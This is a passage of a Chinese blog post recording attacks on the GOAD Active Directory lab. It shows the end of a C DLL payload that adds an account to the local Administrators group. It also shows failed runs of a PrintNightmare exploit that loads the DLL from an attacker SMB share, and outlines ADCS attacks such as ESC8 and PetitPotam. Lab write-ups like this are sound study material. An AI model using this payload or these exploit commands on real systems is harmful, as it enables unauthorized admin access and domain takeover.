    // Add user to "Administrators" local group
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                    // local server
        _T("Administrators"),
        0,                        // information level
        (LPBYTE)&gd,
        1                        // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point.
int main()
{
    return CreateAdminUserInternal();
}
1
2
3
4
5
6
7
8
9
┌──(root㉿kaada)-[/opt/printnightmare]
└─# python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@winterfell.north.sevenkingdoms.local '\\192.168.10.150\ATTACKERSHARE\pnightmare2.dll'
[*] Connecting to ncacn_np:winterfell.north.sevenkingdoms.local[\PIPE\spoolss]
[-] Connection Failed
                                                                                                                                                           
┌──(root㉿kaada)-[/opt/printnightmare]
└─# ls
ADDUSER.C  CVE-2021-1675.py  Images  nightmare.dll  pnightmare2.dll  README.md  SharpPrintNightmare

神人了。

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kaada)-[/opt/printnightmare]
└─# smbclient //192.168.10.11/Users -U 'north.sevenkingdoms.local/jon.snow%iknownothing' -c 'put pnightmare2.dll Public\pnightmare2.dll'
do_connect: Connection to 192.168.10.11 failed (Error NT_STATUS_IO_TIMEOUT)
                                                           ┌──(root㉿kaada)-[/opt/printnightmare]
└─# ping 192.168.10.11
PING 192.168.10.11 (192.168.10.11) 56(84) bytes of data.
^C
--- 192.168.10.11 ping statistics ---
90 packets transmitted, 0 received, 100% packet loss, time 91193ms

唉,算了,知道有这么个事就行。

下面测试的是在域中设置了 ADCS 的情况下进行攻击。 首先,我们将使用 petitpotam unauthenticated 和 ESC8 攻击获取 essos.local 上的域管理员,接下来我们将使用 certipy、bloodhound 和用户帐户枚举模板证书。 最后,我们将利用以下攻击:certipy、esc1、esc2、esc3、esc4、esc6、certifried 和 shadow credentials。

ESC8 - coerce to domain admin

  • 为了使这种攻击起作用,我们需要:
    • ADCS 在启用了 Web 注册的域上运行。
    • 一种有效的coerce方法(这里我们使用 petitpotam unauthent,但经过身份验证的 printerbug 或其他强制方法将同样有效)
    • 有一个有用的模板可以利用 ESC8,默认情况下在活动目录上,它的名字是 DomainController

靶机服务彻底崩了…….重装了一遍。可能ip会有变动。

#GOAD
从零开始的GOAD生活(中)
http://example.com/2026/02/02/从零开始的GOAD生活-中/
Author
Skyarrow
Posted on
February 2, 2026
Licensed under